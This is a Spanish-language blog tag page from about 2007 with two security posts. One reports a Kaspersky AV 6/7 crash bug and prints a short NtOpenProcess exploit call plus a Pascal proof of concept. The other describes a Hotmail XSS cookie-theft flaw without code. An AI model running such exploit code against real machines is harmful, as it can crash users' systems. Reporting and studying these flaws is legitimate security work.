Tag | "bug"
Agujero de Seguridad en Kaspersky AV 6 y 7
Mi antivirus favorito Kaspersky, desde hace mucho tiempo sufre de un bug en sus versiones 6.0 y 7.0, el bug consiste en un crash del sistema protegido por este antivirus, incluso desde la cuenta de invitado. Este material fue hecho público varios años atras (desde el 2005), y en el ultimo verano publicaron un nuevo exploit para Kaspersky AV 6.0 el cual se basa en los descubrimientos previos de Ms-Rem. Y después de todo este tiempo, nada ha cambiado. Aún ahora con la nueva versión de Kaspersky AV 7.0 este exploit sigue funcionando muy bien.
El objetivo principal de este exploit es hacer una llamada a NtOpenProcess con parámetros inválidos. Esta función esta hookeada por el driver de Kaspersky llamado klif.sys y la razón para el hook es obia (Esta es la manera en que Kaspersky AV se protege de accesos no autorizados que pudieran cerrar el proceso, esta es una practica muy usada por diferentes tipos de rootkits y malware)
El exploit original creado por Ms-Rem en el 2005 consiste en lo siguiente:
NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);
Este es el prototipo de la función:
NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL );
Y este es un pequeño exploit escrito en Pascal:
var
ob1: OBJECT_ATTRIBUTES;
p1: DWORD;
begin
ob1.Length := sizeof(ob1);
NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
end;
Continuar Leyendo...MAS INFORMACION:
http://forum.sysinternals.com
http://foro.elhacker.net
Bug XSS en Hotmail, permite robar cuentas de correo
Miércoles, Abril 11, 2007 | Por Walter Hernandez
Una vulnerabilidad en el manejo de correos por parte de Hotmail puede ser utilizada para la obtención de contraseñas a las cuentas personales. Hace unos días apareció en diferentes sitios web de comentarios personales (Blogs) una explicación de un fallo de seguridad en Hotmail. Ha sido a su vez comentado en numerosos sitios de seguridad informática de habla hispana. Publicado días atrás en un foro de seguridad como una novedad, varios expertos comprobaron la gravedad del problema, lo que elevó el nivel de alerta, debido a la popularidad que goza el mencionado servicio.
“Lo sorprendente de esta vulnerabilidad es lo fácil que puede ser usada para lograr datos de la cuenta personal sin tener mucho conocimiento del tema”, comentaron investigadores de ESET. “En menos de 5 minutos logramos hacer una prueba exitosa con una cuenta temporal.”
Un atacante podría engañar a los usuarios del servicio mediante un correo electrónico con un enlace de apariencia inocente.
Al visitar el sitio donde es hospedado la página maliciosa, se ejecuta un script que captura una cookie generada por el servidor de Hotmail. En la misma se encuentran datos confidenciales que el usuario utiliza para acceder a su correo. Esta información es enviada automáticamente al autor del ataque, en un correo electrónico.
Es importante tener en cuenta que al hacer un simple clic, la cuenta de la víctima ha dejado de ser segura. Esto puede ser usado para atacar a toda la lista de contactos existentes, sin que se perciba nada extraño.
El robo de identidad es un delito de rápido crecimiento, y este fallo ayuda a aumentar sus incidencias globales. Un pirata podría utilizar las cuentas de Hotmail para enviar decenas de mensajes simulando ser el dueño de las mismas.
A tiempo de publicar la noticia, el fallo continuaba siendo explotable.
Son afectadas las cuentas de Hotmail y relacionadas.
Microsoft, responsable de Hotmail, no ha hecho comentario alguno ni se ha publicado ninguna resolución sobre el problema reportado.
Nunca abra un enlace no solicitado, recibido por correo electrónico o messenger.
Si aún desea abrir un enlace de una fuente segura, se recomienda proceder de la siguiente manera. Cierre las sesiones de su MSN Messenger e Internet Explorer en uso y utilice un nuevo navegador para pegar la dirección en él, e ir al sitio deseado.
Esto minimizará el impacto de esta vulnerabilidad, pero de ningún modo significa que estaremos completamente a salvo del robo de información personal, si no aplicamos las más estrictas normas de conducta al navegar por Internet.
Si quieren pueden ver en que consiste el fallo y como pueden explotarlo tambien (Espero no abusen de esto) xD
Red GDideas
-
Ruben Rosales: Buenas, agradeceria mucho si me pudieran enviar un...
-
holatitola: por favor, me sería de gran utilidad una cuenta de...
-
Gera: Hola Jamaicón. Te deseo un feliz año este 2009. ¿C...
-
laura: yo opino q no hay por q odiar alos emos no nos hac...
-
Marcelo Pez: si es pocible mandenmenla por correo lo vuelvo a r...
- Caso Querétaro contra EMOs a detalle: El papel del Internet (355)
- 10 Invitaciones a Demonoid: Segunda Ronda (109)
- Sociedad Queretana contra "Emo´s" (101)
- Dibujos de calidad impresionante (Goticas, Hadas, Brujas, etc) (86)
- Caso Querétaro contra EMOs a detalle: El Video & Manifestaciones (81)
- Demonoid Regresa!! [Regalamos 5 invitaciones] (52)
- Invitaciones Demonoid (4 invitaciones) (48)
- Demonoid Invitation Give Away (5 invitaciones) (44)
- Instala MAC OsX en tu PC, en 3 pasos (33)
- Reglamos Invitaciones Boxee (33)
- Apple Presenta iWork.com
- CES 09: Posible Nueva Acer Aspire One de 10 pulgadas en pantalla
- Conceptos nuevos de Blogging
- Vimeo Pic : Volando en los acantilados en Noruega
- Windows 7 Soportara Divx de manera nativa
- Billionaire Boys Club: Season 8 Look Book
- Twply: Vendiendo tu información de Twitter a Spammers
- Aplicaciones pagadas para el Android disponibles este 2009
- Unlock del iPhone 3G Disponible
- Feliz Año Nuevo Desde Walhez y la Estación Espacial
Patrocinadores
Warning: Attempt to assign property of non-object in /home2/gdlabs/public_html/wp-includes/rss.php on line 449
Jueves, Septiembre 20, 2007 | Por Walter Hernandez
0 Comentarios